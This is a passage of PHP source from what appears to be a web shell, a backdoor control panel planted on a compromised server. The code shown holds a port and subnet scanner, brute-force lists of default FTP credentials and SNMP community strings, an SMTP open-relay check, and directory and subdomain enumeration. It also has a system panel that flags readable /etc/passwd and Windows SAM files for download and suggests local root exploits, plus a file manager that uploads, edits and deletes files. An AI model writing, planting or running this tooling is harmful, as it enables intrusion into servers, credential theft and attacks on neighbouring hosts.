$start=time();
|
||
|
for($i=$from;$i<=$to;$i++){
|
||
|
if($tcp){
|
||
|
if(checkthisporT($target,$i,$timeout)){
|
||
|
$nu++;
|
||
|
$ser='';
|
||
|
if(getservbyport($i,'tcp'))$ser='('.getservbyport($i,'tcp').')';
|
||
|
echo "$nu) $i $ser (<a href='telnet://$target:$i'>Connect</a>) [TCP]<br>";
|
||
|
}
|
||
|
}
|
||
|
if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser='';if(getservbyport($i,'udp'))$ser='('.getservbyport($i,'udp').')';echo "$nu) $i $ser [UDP]<br>";}
|
||
|
}
|
||
|
$time=time()-$start;
|
||
|
echo "Done! ($time seconds)</font>";
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['securityscanner'])){
|
||
|
echo '<font color=blue>';
|
||
|
$start=time();
|
||
|
$from=$_REQUEST['from'];
|
||
|
$to=(int)$_REQUEST['to'];
|
||
|
$timeout=(int)$_REQUEST['timeout'];
|
||
|
$f=substr($from,strrpos($from,'.')+1);
|
||
|
$from=substr($from,0,strrpos($from,'.'));
|
||
|
if(!empty($_REQUEST['httpscanner'])){
|
||
|
echo 'Loading webserver bug list...';
|
||
|
$buglist=whereistmP().DIRECTORY_SEPARATOR.uniqid('BL');
|
||
|
$dl=downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
|
||
|
if($dl){$file=file($buglist);echo 'Done! scanning started.<br><br>';}else echo 'Failed!!! scanning started without webserver security testing...<br><br>';
|
||
|
}else{$fr=htmlspecialchars($from);echo "Scanning $fr.$f-$fr.$to:<br><br>";}
|
||
|
for($i=$f;$i<=$to;$i++){
|
||
|
$output=0;
|
||
|
$ip="$from.$i";
|
||
|
if(!empty($_REQUEST['nslookup'])){
|
||
|
$hn=gethostbyaddr($ip);
|
||
|
if($hn!=$ip)echo "$ip [$hn]<br>"; $output=1;}
|
||
|
if(!empty($_REQUEST['ipscanner'])){
|
||
|
$port=$_REQUEST['port'];
|
||
|
if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;
|
||
|
$open=$ser='';
|
||
|
foreach($p as $po){
|
||
|
$scan=checkthisporT($ip,$po,$timeout);
|
||
|
if($scan){
|
||
|
$ser='';
|
||
|
if($ser=getservbyport($po,'tcp'))$ser="($ser)";
|
||
|
$open.=" $po$ser ";
|
||
|
}
|
||
|
}
|
||
|
if($open){echo "$ip) Open ports:$open<br>";$output=1;}
|
||
|
|
||
|
}
|
||
|
if(!empty($_REQUEST['httpbanner'])){
|
||
|
$res=get_sw_namE($ip,$timeout);
|
||
|
if($res){
|
||
|
echo "$ip) Webserver software: ";
|
||
|
if($res==-1)echo 'Unknow';
|
||
|
else echo $res;
|
||
|
echo '<br>';
|
||
|
$output=1;
|
||
|
}
|
||
|
}
|
||
|
if(!empty($_REQUEST['httpscanner'])){
|
||
|
if(checkthisporT($ip,80,$timeout) && !empty($file)){
|
||
|
$admin=array('/admin/','/adm/');
|
||
|
$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
|
||
|
$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
|
||
|
$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
|
||
|
foreach($file as $v){
|
||
|
$vuln=array();
|
||
|
$v=trim($v);
|
||
|
if(!$v || $v{0}=='#')continue;
|
||
|
$v=str_replace('","','^',$v);
|
||
|
$v=str_replace('"','',$v);
|
||
|
$vuln=explode('^',$v);
|
||
|
$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
|
||
|
if(strstr($page,'@CGIDIRS'))
|
||
|
foreach($cgi as $cg){
|
||
|
$cqich=str_replace('@CGIDIRS',$cg,$page);
|
||
|
$url="http://$ip$cqich";
|
||
|
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
|
||
|
if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
|
||
|
}
|
||
|
elseif(strstr($page,'@ADMINDIRS'))
|
||
|
foreach($admin as $cg){
|
||
|
$adminch=str_replace('@ADMINDIRS',$cg,$page);
|
||
|
$url="http://$ip$adminch";
|
||
|
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
|
||
|
if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
|
||
|
}
|
||
|
elseif(strstr($page,'@USERS'))
|
||
|
foreach($users as $cg){
|
||
|
$userch=str_replace('@USERS',$cg,$page);
|
||
|
$url="http://$ip$userch";
|
||
|
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
|
||
|
if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
|
||
|
}
|
||
|
elseif(strstr($page,'@NUKE'))
|
||
|
foreach($nuke as $cg){
|
||
|
$nukech=str_replace('@NUKE',$cg,$page);
|
||
|
$url="http://$ip$nukech";
|
||
|
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
|
||
|
if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
|
||
|
}
|
||
|
else{
|
||
|
$url="http://$ip$page";
|
||
|
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
|
||
|
if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
if(!empty($_REQUEST['smtprelay'])){
|
||
|
if(checkthisporT($ip,25,$timeout)){
|
||
|
$res='';
|
||
|
$res=checksmtP($ip,$timeout);
|
||
|
if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}
|
||
|
}
|
||
|
}
|
||
|
if(!empty($_REQUEST['snmpscanner'])){
|
||
|
if(checkthisporT($ip,161,$timeout,1)){
|
||
|
$com=$_REQUEST['com'];
|
||
|
$coms=$res='';
|
||
|
if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;
|
||
|
foreach($c as $v){
|
||
|
$ret=snmpchecK($ip,$v,$timeout);
|
||
|
if($ret)$coms.=" $v ";
|
||
|
}
|
||
|
if($coms!=''){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
|
||
|
}
|
||
|
}
|
||
|
if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){
|
||
|
if(checkthisporT($ip,21,$timeout)){
|
||
|
$usps=explode(',',$_REQUEST['userpass']);
|
||
|
foreach($usps as $v){
|
||
|
$user=substr($v,0,strpos($v,':'));
|
||
|
$pass=substr($v,strpos($v,':')+1);
|
||
|
if($pass=='[BLANK]')$pass='';
|
||
|
$ftp=ftp_connect($ip,21,$timeout);
|
||
|
if($ftp){
|
||
|
if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (<b><a href='";echo hlinK("seC=ftpc&workingdiR=".getcwd()."&hosT=$ip&useR=$user&pasS=$pass");echo "' target='_blank'>Connect</a></b>)<br>";}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
if($output)echo '<hr size=1 noshade>';
|
||
|
}
|
||
|
$time=time()-$start;
|
||
|
echo "Done! ($time seconds)</font>";
|
||
|
if(!empty($buglist))unlink($buglist);
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['directoryscanner'])){
|
||
|
$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];
|
||
|
echo "<font color=blue><pre>Scanning started...\n";
|
||
|
for($i=0;$i<count($dir);$i++){
|
||
|
$d=trim($dir[$i]);
|
||
|
if($r){
|
||
|
$adr="http://$host/$d/";
|
||
|
if(check_urL($adr,'GET','302')){echo "Directory Found: <a href='$adr' target='_blank'>$adr</a>\n";}
|
||
|
}else{
|
||
|
$adr="$d.$host";
|
||
|
$ip=gethostbyname($adr);
|
||
|
if($ip!=$adr){echo "Subdomain Found: <a href='http://$adr' target='_blank'>$adr($ip)</a>\n";}
|
||
|
}
|
||
|
}
|
||
|
echo 'Done!</pre></font>';
|
||
|
}
|
||
|
else{
|
||
|
$t="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
|
||
|
$chbox=(extension_loaded('sockets'))?"<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
|
||
|
echo "<center>$t><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>$chbox</td><td bgcolor='#808080' align='right'>$hcwd<input type=submit class=buttons name=portscanner value=Scan></form>$et$t><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='".$_SERVER["HTTP_HOST"]."' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
|
||
|
$host=substr($host,0,strrpos($host,"."));
|
||
|
echo "$t name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>$et";
|
||
|
}
|
||
|
}
|
||
|
function sysinfO(){
|
||
|
global $windows,$disablefunctions,$cwd,$safemode;
|
||
|
$t8="<td width='25%' bgcolor='#808080'>";
|
||
|
$t6="<td width='25%' bgcolor='#666666'>";
|
||
|
$mil="<a target='_blank' href='http://www.milw0rm.org/related.php?program=";
|
||
|
$basedir=(ini_get('open_basedir') || strtoupper(ini_get('open_basedir'))=='ON')?'ON':'OFF';
|
||
|
if(!empty($_SERVER['PROCESSOR_IDENTIFIER']))$CPU=$_SERVER['PROCESSOR_IDENTIFIER'];
|
||
|
$osver=$tsize=$fsize='';
|
||
|
$ds=implode(' ',$disablefunctions);
|
||
|
if($windows){
|
||
|
$osver=' ('.shelL('ver').')';
|
||
|
$sysroot=shelL("echo %systemroot%");
|
||
|
if(empty($sysroot))$sysroot=$_SERVER['SystemRoot'];
|
||
|
if(empty($sysroot))$sysroot = getenv('windir');
|
||
|
if(empty($sysroot))$sysroot = 'Not Found';
|
||
|
if(empty($CPU))$CPU=shelL('echo %PROCESSOR_IDENTIFIER%');
|
||
|
for($i=66;$i<=90;$i++){
|
||
|
$drive=chr($i).':\\';
|
||
|
if(is_dir($drive)){
|
||
|
$fsize+=disk_free_space($drive);
|
||
|
$tsize+=disk_total_space($drive);
|
||
|
}
|
||
|
}
|
||
|
}else{
|
||
|
$ap=shelL('whereis apache');
|
||
|
if(!$ap)$ap='Unknow';
|
||
|
$fsize=disk_free_space('/');
|
||
|
$tsize=disk_total_space('/');
|
||
|
}
|
||
|
$xpl=rootxpL();if(!$xpl)$xpl='Not found.';
|
||
|
$disksize='Used spase: '.showsizE($tsize-$fsize).' Free space: '.showsizE($fsize).' Total space: '.showsizE($tsize);
|
||
|
if(empty($CPU))$CPU='Unknow';
|
||
|
$os=php_uname();
|
||
|
$osn=php_uname('s');
|
||
|
if(!$windows){
|
||
|
$ker=php_uname('r');
|
||
|
$o=($osn=='Linux')?'Linux+Kernel':$osn;
|
||
|
$os=str_replace($osn,"${mil}$o'>$osn</a>",$os);
|
||
|
$os=str_replace($ker,"${mil}Linux+Kernel'>$ker</a>",$os);
|
||
|
$inpa=':';
|
||
|
}else{
|
||
|
$sam=$sysroot."\\system32\\config\\SAM";
|
||
|
$inpa=';';
|
||
|
$os=str_replace($osn,"${mil}MS+Windows'>$osn</a>",$os);
|
||
|
}
|
||
|
$cuser=get_current_user();
|
||
|
if(!$cuser)$cuser='Unknow';
|
||
|
$software=str_replace('Apache',"${mil}Apache'>Apache</a>",$_SERVER['SERVER_SOFTWARE']);
|
||
|
echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td>Server information:</td></tr><tr>${t6}Server:</td><td bgcolor='#666666'>".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr>${t8}Operation system:</td><td bgcolor='#808080'>$os$osver</td></tr><tr>${t6}Web server application:</td><td bgcolor='#666666'>$software</td></tr><tr>${t8}CPU:</td><td bgcolor='#808080'>$CPU</td></tr>${t6}Disk status:</td><td bgcolor='#666666'>$disksize</td></tr><tr>${t8}User domain:</td><td bgcolor='#808080'>";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr>${t6}User name:</td><td bgcolor='#666666'>$cuser</td></tr>";
|
||
|
if($windows){
|
||
|
echo "<tr>${t8}Windows directory:</td><td bgcolor='#808080'><a href='".hlinK("seC=fm&workingdiR=$sysroot")."'>$sysroot</a></td></tr><tr>${t6}Sam file:</td><td bgcolor='#666666'>";if(is_readable(($sam)))echo "<a href='".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."'>Readable</a>"; else echo 'Not readable';echo '</td></tr>';
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
echo "<tr>${t8}UID - GID:</td><td bgcolor='#808080'>".getmyuid().' - '.getmygid()."</td></tr><tr>${t6}Recommended local root exploits:</td><td bgcolor='#666666'>$xpl</td></tr><tr>${t8}Passwd file:</td><td bgcolor='#808080'>";
|
||
|
if(is_readable('/etc/passwd'))echo "<a href='".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."'>Readable</a>";else echo'Not readable';echo "</td></tr><tr>${t6}${mil}cpanel'>cPanel</a>:</td><td bgcolor='#666666'>";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
|
||
|
if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "<a href='".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."'>Readable</a>";else echo 'Not readable';}else echo 'Not found';echo ')</td></tr>';
|
||
|
}
|
||
|
echo "<tr>$t8${mil}PHP'>PHP</a> version:</td><td bgcolor='#808080'><a href='?=".php_logo_guid()."' target='_blank'>".PHP_VERSION."</a> (<a href='".hlinK("seC=phpinfo&workingdiR=$cwd")."'>more...</a>)</td></tr><tr>${t6}Zend version:</td><td bgcolor='#666666'>";if (function_exists('zend_version')) echo "<a href='?=".zend_logo_guid()."' target='_blank'>".zend_version().'</a>';else echo 'Not Found';echo "</td><tr>${t8}Include path:</td><td bgcolor='#808080'>".str_replace($inpa,' ',DEFAULT_INCLUDE_PATH)."</td><tr>${t6}PHP Modules:</td><td bgcolor='#666666'>";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i))$i="($i)";$l=hlinK("exT=$v");echo "<a href='javascript:void(0)' onclick=\"window.open('$l','','width=300,height=200,scrollbars=yes')\">$v</a> $i ";}echo "</td><tr>${t8}Disabled functions:</td><td bgcolor='#808080'>";if(!empty($ds))echo "$ds ";else echo 'Nothing'; echo"</td></tr><tr>${t6}Safe mode:</td><td bgcolor='#666666'>$safemode</td></tr><tr>${t8}Open base dir:</td><td bgcolor='#808080'>$basedir</td></tr><tr>${t6}DBMS:</td><td bgcolor='#666666'>";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle'>Oracle</a> ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq</td></tr></table>";
|
||
|
}
|
||
|
function checksuM($file){
|
||
|
global $et;
|
||
|
echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td width='10%' bgcolor='#666666'><b>MD5:</b> <font color=#F0F0F0>".md5_file($file).'</font><br><b>SHA1:</b><font color=#F0F0F0>'.sha1_file($file)."</font>$et";
|
||
|
}
|
||
|
function listdiR($cwd,$task){
|
||
|
$c=getcwd();
|
||
|
$dh=opendir($cwd);
|
||
|
while($cont=readdir($dh)){
|
||
|
if($cont=='.' || $cont=='..')continue;
|
||
|
$adr=$cwd.DIRECTORY_SEPARATOR.$cont;
|
||
|
switch($task){
|
||
|
case '0':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
|
||
|
case '1':if(is_writeable($adr)){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
|
||
|
case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
|
||
|
case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
|
||
|
case '4':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
|
||
|
case '5':if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
|
||
|
case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) || (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
|
||
|
case '7':if(strstr($cont,$_REQUEST['search']) || (is_file($adr) && strstr(file_get_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
|
||
|
case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}
|
||
|
}
|
||
|
if(is_dir($adr))listdiR($adr,$task);
|
||
|
}
|
||
|
}
|
||
|
if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}
|
||
|
if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}
|
||
|
function filemanageR(){
|
||
|
global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;
|
||
|
$table="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'>";
|
||
|
$td1n="<td width='22%' bgcolor='#666666'>";
|
||
|
$td2m="<td width='22%' bgcolor='#808080'>";
|
||
|
$td1i="<td width='5%' bgcolor='#666666'>";
|
||
|
$td2i="<td width='5%' bgcolor='#808080'>";
|
||
|
$tdnr="<td width='22%' bgcolor='#800000'>";
|
||
|
$tdw="<td width='22%' bgcolor='#006E00'>";
|
||
|
if(!empty($_REQUEST['task'])){
|
||
|
if(!empty($_REQUEST['search']))$_REQUEST['task']=7;
|
||
|
if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
|
||
|
echo '<font color=blue><pre>';
|
||
|
listdiR($cwd,$_REQUEST['task']);
|
||
|
echo '</pre></font>';
|
||
|
}else{
|
||
|
if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV']) || !empty($_REQUEST['rN'])){
|
||
|
if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
|
||
|
$title='Destination';
|
||
|
$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
|
||
|
$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';
|
||
|
}else{
|
||
|
$ad=$_REQUEST['rN'];
|
||
|
$title='New name';
|
||
|
$dis='Rename';
|
||
|
}
|
||
|
if(!!empty($_REQUEST['deS'])){
|
||
|
echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='100%' bgcolor='#333333'>$title:</td></tr><tr>$td1n<form method='POST'><input type=text value='";if(empty($_REQUEST['rN']))echo $cwd;echo "' size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value='".htmlspecialchars($ad)."' name=cp><input class=buttons type=submit value=$dis></form>$et</center>";
|
||
|
}else{
|
||
|
if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);
|
||
|
else{
|
||
|
copy($ad,$_REQUEST['deS']);
|
||
|
if(!empty($_REQUEST['mV']))unlink($ad);
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}
|
||
|
if(!empty($_FILES['uploadfile'])){
|
||
|
move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
|
||
|
echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
|
||
|
}
|
||
|
$select="<select onChange='document.location=this.options[this.selectedIndex].value;'><option value='".hlinK("seC=fm&workingdiR=$cwd")."'>--------</option><option value='";
|
||
|
if(!empty($_REQUEST['newf'])){
|
||
|
if(!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],'');}
|
||
|
if(!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
|
||
|
}
|
||
|
if($windows){
|
||
|
echo "$table<td><b>Drives:</b> ";
|
||
|
for($i=66;$i<=90;$i++){$drive=chr($i).':';
|
||
|
if(is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title='$vol' href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
|
||
|
}
|
||
|
echo $et;
|
||
|
}
|
||
|
echo "$table<form method='POST'><tr><td width='20%'><b>[ <a id='lk' style='text-decoration:none' href='#' onClick=\"HS('div');\">-</a> ] Location:</b><input type=text name=workingdiR size=135 value='$cwd'><input class=buttons type=submit value=Change></form>$et";
|
||
|
$file=$dir=$link=array();
|
||
|
if($dirhandle=opendir($cwd)){
|
||
|
while($cont=readdir($dirhandle)){
|
||
|
if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
|
||
|
elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;
|
||
|
else $link[]=$cont;
|
||
|
}
|
||
|
closedir($dirhandle);
|
||
|
sort($file);sort($dir);sort($link);
|
||
|
echo "<div id='div'><table border=1 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bordercolor='#282828' bgcolor='#333333' width='100%'><tr><td width='30%' bgcolor='#333333' align='center'>Name</td><td width='13%' bgcolor='#333333' align='center'>Owner</td><td width='12%' bgcolor='#333333' align='center'>Modification time</td><td width='12%' bgcolor='#333333' align='center'>Last change</td><td width='5%' bgcolor='#333333' align='center'>Info</td><td width='7%' bgcolor='#333333' align='center'>Size</td><td width='15%' bgcolor='#333333' align='center'>Actions</td></tr>";
|
||
|
$i=0;
|
||
|
foreach($dir as $dn){
|
||
|
echo '<tr>';
|
||
|
$i++;
|
||
|
$own='Unknow';
|
||
|
$owner=posix_getpwuid(fileowner($dn));
|
||
|
$mdate=date('Y/m/d H:i:s',filemtime($dn));
|
||
|
$adate=date('Y/m/d H:i:s',fileatime($dn));
|
||
|
$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>Open</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."'>Rename</option><option value='".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."'>Remove</option></select></td>";
|
||
|
if($owner)$own="<a title=' Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
|
||
|
if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
|
||
|
if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;
|
||
|
echo "<a href='".hlinK('seC=fm&workingdiR='.realpath($dn))."'>";
|
||
|
if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '</a>';
|
||
|
echo $cl1."$own</td>";
|
||
|
echo $cl1."$mdate</td>";
|
||
|
echo $cl1."$adate</td>";
|
||
|
echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$dn')\" title='Change mode'>";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W';echo '</a></td>';
|
||
|
echo "$cl1------</td>";
|
||
|
echo $cl2.$diraction;
|
||
|
echo '</tr>';
|
||
|
}
|
||
|
foreach($file as $fn){
|
||
|
echo '<tr>';
|
||
|
$i++;
|
||
|
$own='Unknow';
|
||
|
$owner=posix_getpwuid(fileowner($fn));
|
||
|
$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>Open</option><option value='".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."'>Move</option><option value='".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."'>Remove</option></select></td>";
|
||
|
$mdate=date('Y/m/d H:i:s',filemtime($fn));
|
||
|
